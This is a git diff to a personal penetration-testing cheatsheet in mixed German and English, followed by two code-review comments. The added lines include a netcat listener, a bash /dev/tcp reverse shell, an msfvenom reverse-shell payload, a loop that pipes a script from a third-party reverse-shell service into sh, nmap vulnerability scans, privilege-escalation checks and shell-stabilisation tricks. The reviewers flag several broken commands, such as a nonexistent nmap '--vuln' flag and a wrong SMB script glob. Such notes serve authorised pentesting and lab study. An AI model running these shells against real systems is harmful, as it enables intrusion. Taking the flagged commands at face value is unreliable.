diff --git a/Cheatsheet.md b/Cheatsheet.md index ebe2656..e541cda 100644 --- a/Cheatsheet.md +++ b/Cheatsheet.md 
@@ -26,70 +26,137 @@ to filter output for open ips ```bash nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt ``` -scan open ports + +scan open ports: ```bash nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 ``` +#### bei windows +```bash +nmap --vuln ip +``` +##### bei windows \+ smb + +```bash +nmap --script vuln-smb* ip +nicht mehr sicher welches es war +nmap --script smb-vuln* ip +``` + +# inital access +### start listener: +```bash +rlwrap -cAr nc -nlvp 9002 +``` +### reverse shell bash: +```bash +/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1 +``` +### reverse shell file: +```bash +msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py +``` +-> from revshells.com + +### untested: + Reverse Shell as a Service + + 1. On your machine: +```bash + nc -l 1337 + or nlvp? +``` + + 2. On the target machine: +```bash + curl https://reverse-shell.sh/yourip:1337 | sh +``` +#### reconnecting: +```bash +while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done +``` +# privilege escalation - - - +### always run these: +```bash +sudo -l +``` +if sudo doesn't work: +[[#^78d3ce|spawn shell]] +#### check cronjobs +```bash +ls /etc/cron.* +crontab -l +``` ## TTY Spawn Shell -Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. +##### if sudo still doesn't work +use +```bash +sudo -S command +``` +Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. 
### Python spawn shell +```bash python -c 'import pty; pty.spawn("/bin/bash")' - +``` Fully Interactive TTY - #### All the steps to stabilize your shell **The first step:** +```bash python3 -c 'import pty;pty.spawn("/bin/bash")' +``` Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys. - - **Step two is:** +```bash export TERM=xterm +``` This will give us access to term commands such as clear. - - **Finally (and most importantly) we will background the shell using** +```bash Ctrl + Z +``` Back in our own terminal we use +```bash stty raw -echo; fg +``` This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes +```bash stty rows 38 columns 116 - +``` ### OS system spawn shell +```bash echo os.system("/bin/bash") - +``` ### Bash spawn shell +```bash /bin/sh -i - +``` ### Perl spawn shell +```bash perl —e 'exec "/bin/sh";' - +``` ### Ruby spawn shell ruby: exec "/bin/sh" @@ -104,12 +171,30 @@ exec "/bin/sh" ### VI spawn shell +```bash :!bash - +``` ### VI(2) spawn shell +```bash :set shell=/bin/bash:shell - +``` ### Nmap spawn shell +```bash !sh +``` + +#### Exiftools + +Metadaten auslesen: + +```bash +exiftool picture.png +``` + +Binwalk (Binary Daten exportieren): + +```bash +binwalk -e picture.png +```
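Review bot: in the first hunk the added `nmap --vuln ip` line is not a valid invocation: nmap has no `--vuln` option, the vuln scripts are a script category selected with `--script vuln`. In the same block, the "bei windows + smb" fence carries two alternatives plus the prose note "nicht mehr sicher welches es war" inside the bash fence; the NSE scripts are named `smb-vuln-*`, so only the `smb-vuln*` glob matches anything and the `vuln-smb*` line and the note should be dropped rather than shipped as copy-paste commands. The "untested" Reverse Shell as a Service block pipes unverified code from a third-party host straight into `sh` with no integrity check, which the heading should say explicitly before anyone copies it. Smaller points: `Ctrl + Z` is a keystroke and should not sit in a bash fence; `[[#^78d3ce|spawn shell]]` is Obsidian wikilink syntax and will not render as a link on GitHub; "if sudo still doesn't work" under `sudo -S` should say what `-S` actually does (read the password from stdin); the `perl —e` line uses a typographic dash instead of `-e` and fails when copied, which this hunk re-fences without fixing; and "inital access" is a typo for "initial access".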
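Review bot: in the second hunk the new `#### Exiftools` block (exiftool and binwalk) is appended as a level-4 sub-heading under `## TTY Spawn Shell`, but it is unrelated file-metadata and firmware-extraction tooling and belongs in its own section; the heading should also name the tool as `exiftool`, and the German labels "Metadaten auslesen" and "Binary Daten exportieren" are inconsistent with the English used elsewhere in the file. The `!sh` line under "Nmap spawn shell" only applies to nmap's old interactive mode, which has been removed from current releases, so the entry needs a note saying which versions it still works on or should go.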